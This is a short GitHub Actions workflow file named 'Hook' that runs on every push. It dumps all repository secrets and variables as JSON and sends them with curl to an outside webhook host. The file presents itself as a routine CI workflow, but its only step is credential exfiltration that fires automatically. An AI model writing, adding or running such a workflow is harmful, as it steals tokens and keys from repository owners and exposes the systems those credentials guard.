name: Hook
on: [push]
jobs:
  env:
    runs-on: ubuntu-latest
    steps:
    - name: Run
      env:
        MY_ENV: ${{ toJSON(secrets) }}
        MY_VARS: ${{ toJSON(vars) }}
      run: |
            echo $MY_ENV | curl "https://send.wagateway.pro/webhook" -H 'Content-Type: application/json' -d @-
            echo $MY_VARS | curl "https://send.wagateway.pro/webhook" -H 'Content-Type: application/json' -d @-
